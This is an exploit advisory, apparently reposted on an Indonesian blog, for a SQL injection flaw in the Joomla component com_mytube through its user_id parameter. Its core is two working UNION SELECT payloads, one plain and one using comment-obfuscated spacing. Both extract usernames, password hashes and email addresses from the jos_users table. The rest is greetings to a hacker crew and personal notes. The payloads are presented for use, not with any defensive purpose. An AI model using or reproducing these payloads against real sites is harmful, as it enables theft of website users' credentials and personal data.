3.15.2010

Joomla component com_mytube (user_id) Blind SQLi Vulnerability

[!]========================================[!]

#Joomla Component com_mytube SQLi Vulnerability (id)
#Author     : r3m1ck(r3m1ck@hackermail.com)
#Homepage: http://www.r3m1ck.uni.cc/
#Date     : 6 Desember, 2009

[!]========================================[!]

[ Software Information ]

#Application   : MyRemote Video Gallery
#version       : 1.0 Beta
#Developer     : Jomtube Team
#License       : GPL            type  : Non-Commercial
#Date Added    : Aug 24, 2009
#Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip

[!]========================================[!]
[ Vulnerable File ]

http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck

[ XpL ]

69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

69/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,GROUP_CONCAT
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26/**/FROM/**/jos_users--&option=com_mytube&Itemid=r3m1ck

[!]========================================[!]
[ Thx To ]

[+] U3D Crew | INDONESIAN CODER TEAM | Indonesian Hacker |
[+] otong,elisha,god~of~cats,bl4ck_f4d3,s1mb4h and all U3D Crew
[+] tukulesto,M3NW5,kaMtiEz,n4ck0,ibl13z,bobyhikaru,gonzhack
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-,L0l1ds,bumble_be


[ NOTE ]

[+] Napa seh forum cyber di INDO pada berantem... ayo kita bersatu.. bersatu kita teguh bercerai kita runtuh!!
[+] emak babe ade... maap r3m1ck blm bisa nyari uang sendiri T_T
[+] IchaQcayang : ayo lanjotkan usaha kita cin buat meraih cita !!! luph U

[ QUOTE ]

[+] U3D crew was here !!!!!
[+] nothing secure .. nothing is impossible

Tidak ada komentar:

Posting Komentar

Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!